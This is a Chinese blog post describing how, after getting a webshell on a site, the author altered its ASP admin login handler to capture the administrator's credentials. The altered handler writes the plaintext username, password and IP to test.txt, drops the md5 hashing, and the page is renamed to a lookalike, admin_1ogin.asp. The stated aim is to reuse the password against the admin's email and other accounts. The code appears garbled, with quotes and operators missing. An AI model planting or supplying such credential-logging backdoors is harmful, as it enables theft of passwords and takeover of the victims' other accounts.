截取asp后台登陆密码的代码

2018-09-06 12:27

阅读:427

  在一次安全检测中,其实已拿到了webshell了,但是我还要社工他的邮箱还有其他资料类,所以要得知道他的习性。

  下载了数据库,但是md5密码没办法解密。唉,看来只要记录他的登录管理员 账号密码了!

省得还要去穷取法破解!

这个密码其实说重要也不重要 说不 重要 其实很重要。
因为很多人喜欢使用相同密码。即使是我这类安全检测人员,也免不了使用同一种账号密码的习惯。

首先看看他的后台登陆代码

<%
Dim Login
Set Login=new AdLogin
Login.Execute
Class AdLogin
Private ExCommCls
Private Sub class_initialize
Set CommCls=new CommonCls
ExCommCls.IsIpAllow
ExCommCls.CheckInstall
ExCommCls.GetConfigCache(*)
End Sub
Private Sub class_terminate
Set ExCommCls=nothing
End Sub
public Sub Execute
Dim Action
Action=Request(action)
Select Case Action
Case CheckLogin
CheckLogin
Case LoginOut
LoginOut
Case Else
LoginF
End Select
End Sub
Private Sub CheckLogin
Dim Adname,AdPwd,CheckCode
AdName=ExCommCls.G(Trim(request(Adname)))
AdPwd=md5(Trim(request(AdPwd)))
CheckCode=ExCommCls.G(request(checkCode))
If Trim(CheckCode)<>session(excheckcode) and Application(snIsCheckCode)=是 Then
ExCommCls.ShowMsg 验证码错误!,Application(snblogurl)admin_login.asp
Exit Sub
End If
If Trim(AdName)=CStr(Application(snAdName)) And Trim(AdPwd)=CStr(Application(snAdPwd)) Then
Response.Cookies(Md5(SN))(AdPwd)=AdPwd
session(AdLogin)=Md5(SN)
ExCommCls.GetConfigCache(*)
ExCommCls.GetClassCache()
Response.Redirect(Application(snblogurl)admin_index.asp)
Else
ExCommCls.ShowMsg 帐号或密码错误,Application(snblogurl)admin_login.asp
End if
End Sub
Private Sub LoginOut
Response.Cookies(Md5(SN))(AdName)=
Response.Cookies(Md5(SN))(AdPwd)=
session.Abandon()
ExCommCls.ShowMsg 成功退出登陆,Application(snblogurl)index.asp
End Sub
Private Sub LoginF
%>
看下列代码
AdName=ExCommCls.G(Trim(request(Adname)))
AdPwd=md5(Trim(request(AdPwd)))

---意思很简单,这里就不明说了, 主要看md5 ,密码使用md5加密 这样的话,我们记录的密码也就没用了,还是md5。所以
所以想到了,一个钓鱼手法。 它本来的登录界面是
Private Sub CheckLogin
Dim Adname,AdPwd,CheckCode,StrLogText,ip,ff
AdName=ExCommCls.G(Trim(request(Adname)))
AdPwd=(Trim(request(AdPwd)))
CheckCode=ExCommCls.G(request(checkCode))
strLogFile=test.txt
IP=request(IP)
StrLogText=StrLogTextAdName----AdPwd----IP:IP(REMOTE_HOST)
set f=Server.CreateObject(scripting.filesystemobject)
set ff=f.opentextfile(server.mappath(.)strLogFile,8,true,0)
ff.writeline(chr(13)+chr(10)StrLogText)
ff.close
set ff=nothing
set f=nothing
If Trim(CheckCode)<>session(excheckcode) and Application(snIsCheckCode)=是 Then
ExCommCls.ShowMsg 验证码错误!,Application(snblogurl)Admin_1ogin.asp
Exit Sub
End If
If Trim(AdName)=CStr(Application(snAdName)) And Trim(AdPwd)=CStr(Application(snAdPwd)) Then
Response.Cookies((SN))(AdPwd)=AdPwd
session(AdLogin)=Md5(SN)
ExCommCls.GetConfigCache(*)
ExCommCls.GetClassCache()
Response.Redirect(Application(snblogurl)Admin_1ogin.asp)Else
ExCommCls.ShowMsg 帐号或密码错误,Application(snblogurl)Admin_1ogin.asp
End if
End Sub


看到没,
a=本来的登录页面 现在换成了钓鱼页面
b=本来的登录页面(admin_login.asp)修改成admin_1ogin.asp
为什么呢。
本来的: AdPwd=md5(Trim(request(AdPwd)))
Response.Cookies(Md5(SN))(AdPwd)=AdPwd
修改

AdPwd=(Trim(request(AdPwd)))
Response.Cookies((SN))(AdPwd)=AdPwd

去掉md5。。这样的迷惑手法,使用很久了!。。

没什么技术含量。 还请不要见笑!密码会记录在test.txt上


细心总是好的!


评论


亲,登录后才可以留言!